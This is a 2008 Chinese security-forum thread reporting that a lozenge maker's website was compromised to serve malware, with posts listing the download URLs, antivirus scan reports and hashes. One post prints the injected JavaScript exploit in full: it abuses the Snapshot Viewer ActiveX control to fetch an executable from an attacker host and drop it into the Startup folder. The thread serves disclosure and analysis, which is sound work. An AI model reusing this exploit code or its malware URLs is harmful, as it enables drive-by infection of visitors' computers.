广西金嗓子喉片的网站被挂马？

显示全部楼层 · 发表于 2008-10-19 00:15:36

网站：http://www.goldenthroat.com/docc/index.htm
小A报了，如下图：

[ 本帖最后由 geming3000 于 2008-10-21 11:33 编辑 ]

显示全部楼层 · 发表于 2008-10-19 00:29:04

我家乡的网站，测试！

显示全部楼层 · 发表于 2008-10-19 00:36:15

http://hhhhhttt.cn/1.exe
http://hhhhhttt.cn/5.exe

显示全部楼层 · 发表于 2008-10-19 00:46:24

VirSCAN.org Scanned Report :
Scanned time : 2008/10/19 00:41:13 (CST)
Scanner results: 56%的杀软(22/39)报告发现病毒
File Name    : vc.rar
File Size    : 290130 byte
File Type    : RAR archive data, v1d, os
MD5          : 1dbeb2f2809c19c80bceef557b3420b9
SHA1          : 3fb58cf2067e9c98f132429dd069f3933019b584
Online report  : http://virscan.org/report/864ca97b1315f02a9cf79b8129ec6b75.html

Scanner       Engine Ver    Sig Ver          Sig Date Time Scan result
a-squared    4.0.0.16       2008.10.17       2008-10-17  1.53 -
安博士V3    2008.10.19.00 2008.10.19       2008-10-19  0.99 -
AntiVir       7.9.0.5       7.0.7.58       2008-10-17  2.45 HEUR/HTML.Malware
安天          2.0.18       20081016.1488960  2008-10-16  0.48 -
Arcavir       1.0.5          200810171657    2008-10-17  1.35 Heur.Win32.I
Authentium    5.1.1          200810150216    2008-10-15  2.66 W32/Heuristic-210!Eldorado (Heuristic)
AVAST!       3.0.1          081015-0       2008-10-15  0.05 Win32:Agent-SIM [Trj]
AVG          7.5.52.442    270.8.1/1731    2008-10-17  1.83 -
BitDefender 7.60825.1902933 7.21327          2008-10-18  3.22 Generic.Malware.SP!dldg.1DD469A9
CA (VET)    9.0.0.143    31.6.6154       2008-10-17  3.86 -
ClamAV       0.94          8443             2008-10-18  0.27 -
Comodo       2.11          2.0.0.680       2008-10-18  0.74 -
CP Secure    1.1.0.715    2008.10.18       2008-10-18  6.41 Troj.Downloader.JS.Agent.crr
Dr.Web       4.44.0.9170    2008.10.18       2008-10-18  3.44 -
ewido       4.0.0.2       2008.10.18       2008-10-18  3.13 -
F-Prot       4.4.4.56       20081017       2008-10-17  2.51 Possible W32/Heuristic-210!Eldorado (damaged, not disinfectable)
F-Secure    5.51.6100    2008.10.18.02    2008-10-18  0.31 -
飞塔          2.81-3.113    9.650          2008-10-18  3.05 Suspicious
GData       19.1058/19.65 20081016       2008-10-16  4.95 Win32:Agent-SIM [Trj] [Engine:B]
ViRobot       20081016       2008.10.16       2008-10-16  0.46 -
Ikarus       T3.1.01.44    2008.10.18.71673  2008-10-18  3.47 Trojan-Spy.Win32.Hitpop.C
江民杀毒    11.0.706       2008.10.18       2008-10-18  1.30 -
卡巴斯基    5.5.10       2008.10.18       2008-10-18  0.17 Worm.Win32.AutoRun.qvb
金山毒霸    2008.9.8.18    2008.10.18.20    2008-10-18  0.73 -
迈克菲       5.3.00       5408             2008-10-17  3.57 New Malware.aj
Microsoft    1.4005       2008.10.18       2008-10-18  6.18 TrojanSpy:Win32/Hitpop.gen!C
mks_vir       2.01          2008.10.18       2008-10-18  2.63 Heur.Win32
Norman       5.93.01       5.93.00          2008-10-17  5.15 W32/Packed_Upack.A
熊猫卫士    9.05.01       2008.10.18       2008-10-18  2.84 Suspicious file
趋势科技    8.700-1004    5.606.35       2008-10-18  1.09 -
Quick Heal    9.50          2008.10.18       2008-10-18  2.34 SWF.Exploit
瑞星          20.0          20.66.52.00    2008-10-18  3.88 -
Sophos       2.79.0       4.34             2008-10-18  2.06 -
Sunbelt       3.1.1732.1    2323             2008-10-17  1.16 VIPRE.Suspicious
赛门铁克    1.3.0.24       20081017.003    2008-10-17  0.87 W32.SillyDC
nProtect    2008-10-17.00 2255828          2008-10-17  4.47 Trojan-Downloader/W32.Flux.18186
The Hacker    6.3.1.0       v00118          2008-10-17  0.51 W32/Behav-Heuristic-060
VBA32       3.12.8.7       20081018.0819    2008-10-18  1.98 Backdoor.XiaoBird.5 (paranoid heuristics) (suspicious)
VirusBuster 4.5.11.10    10.90.6/651746 2008-10-18  1.23 -

显示全部楼层 · 发表于 2008-10-19 01:05:22

nod32 飘过

显示全部楼层 · 发表于 2008-10-19 01:16:49

http://hhhhhttt.cn/5.exe
http://hhhhhttt.cn/1.exe

---------------------------
Microsoft Internet Explorer
---------------------------
function killErrors（） {
return true；
}
window.onerror = killErrors；
var x；
var obj；
var mycars = new Array（）；
mycars[0] = "c:/Program Files/Outlook Express/wab.exe"；
mycars[1] = "d:/Program Files/Outlook Express/wab.exe"；
mycars[2] = "e:/Program Files/Outlook Express/wab.exe"；
mycars[3] = "C:/Documents and Settings/Administrator/「开始」菜单/程序/启动/Thunder.exe"；
var objlcx = new ActiveXObject（"snpvw.Snapshot Viewer Control.1"）；
if（objlcx="[object]"）
{
setTimeout（'window.location = "ldap://"',3000）；
for （x in mycars）
{
obj = new ActiveXObject（"snpvw.Snapshot Viewer Control.1"）
var buf1 = 'http://hhhhhttt.cn/5.exe'；
var buf2=mycars[x]；
obj.Zoom = 0；
obj.ShowNavigationButtons = false；
obj.AllowContextMenu = false；
obj.SnapshotPath = buf1；
try
{
obj.CompressedPath = buf2；
obj.PrintSnapshot（）；
}catch（e）{}
}
}
---------------------------
确定
---------------------------

显示全部楼层 · 发表于 2008-10-19 01:32:14

不只1和5
而是1~20

感谢没注册提供技术支持.

显示全部楼层 · 发表于 2008-10-19 02:50:31

0 Scanning directories
   21 Files were scanned
   20 viruses and/or unwanted programs were found
   0 Files were classified as suspicious:
   0 files were deleted
   0 files were repaired
   1 files were moved to quarantine
   0 files were renamed
   0 Files cannot be scanned
   1 Files not concerned
   1 Archives were scanned
   0 Warnings
   1 Notes
红伞全报TR/Dropper.Gen

[ 本帖最后由 aarwwefdds 于 2008-10-19 02:52 编辑 ]

显示全部楼层 · 发表于 2008-10-19 02:56:55

确实挂了!!!!!!!!!!!!!!!!111

显示全部楼层 · 发表于 2008-10-19 03:07:20

avg 拦截

[已鉴定] 广西金嗓子喉片的网站被挂马？